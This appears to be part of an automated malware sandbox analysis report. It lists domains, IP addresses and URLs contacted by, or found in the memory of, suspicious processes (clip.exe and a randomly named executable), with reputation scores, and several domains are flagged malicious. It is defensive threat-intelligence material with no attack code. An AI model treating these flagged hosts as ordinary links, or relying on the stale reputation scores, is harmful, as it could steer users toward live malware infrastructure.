            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
            https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif0%Avira URL Cloudsafe
            http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%20%Avira URL Cloudsafe
            http://www.Bfiworkerscomp.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sandranoll.com
            		213.145.228.16
            		truetrueunknown
            www.dmtxwuatbz.cc
            		172.67.210.102
            		truetrueunknown
            www.xn--matfrmn-jxa4m.se
            		194.9.94.85
            		truetrueunknown
            www.catherineviskadi.com
            		217.160.0.106
            		truetrueunknown
            www.anuts.top
            		23.251.54.212
            		truetrueunknown
            www.bfiworkerscomp.com
            		208.91.197.27
            		truetrueunknown
            parkingpage.namecheap.com
            		91.195.240.19
            		truetrueunknown
            www.telwisey.info
            		199.192.19.19
            		truetrueunknown
            www.hprlz.cz
            		5.44.111.162
            		truetrueunknown
            www.xn--fhq1c541j0zr.com
            		43.252.167.188
            		truetrueunknown
            www.fourgrouw.cfd
            		unknown
            		unknowntrue
              		unknown
              www.hatercoin.online
              		unknown
              		unknowntrueunknown
              www.tinmapco.com
              		unknown
              		unknowntrue
                		unknown
                www.gipsytroya.com
                		unknown
                		unknowntrueunknown
                www.helpers-lion.online
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.xn--fhq1c541j0zr.com/rm91/true
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.bfiworkerscomp.com/xzzi/true
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.dmtxwuatbz.cc/lfkn/true
                • Avira URL Cloud: safe
                		unknown
                http://www.sandranoll.com/aroo/true
                • Avira URL Cloud: malware
                		unknown
                http://www.gipsytroya.com/tf44/true
                • 7%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://www.xn--matfrmn-jxa4m.se/4hda/true
                • 0%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://www.telwisey.info/ei85/true
                • Avira URL Cloud: safe
                		unknown
                http://www.catherineviskadi.com/qe66/true
                • Avira URL Cloud: safe
                		unknown
                http://www.anuts.top/li0t/true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabclip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://dts.gnpge.comNpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/pics/29590/bg1.png)clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.consentmanager.netclip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssclip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://static.loopia.se/responsive/images/iOS-72.pngclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.domaintechnik.at/data/gfx/dt_logo_parking.pngclip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://static.loopia.se/shared/logo/logo-loopia-white.svgclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.pngclip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpgclip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/pics/28903/search.png)clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssclip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.comclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webpclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://delivery.consentmanager.netclip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://static.loopia.se/shared/style/2022-extra-pages.cssclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://static.loopia.se/responsive/images/iOS-114.pngclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.icoclip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.bfiworkerscomp.com/Financial_Services.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.bfiworkerscomp.com/Resume_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzpclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecosia.org/newtab/clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://static.loopia.se/responsive/styles/reset.cssclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.Bfiworkerscomp.comclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://static.loopia.se/responsive/images/iOS-57.pngclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gifclip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsclip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.dmtxwuatbz.ccNpiZrjTdIDFUidJcY.exe, 00000007.00000002.4105630870.0000000005095000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.bfiworkerscomp.com/Buy_Mutual_Funds.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Btclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebclip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://i1.cdn-image.com/__media__/js/min.js?v2.3clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
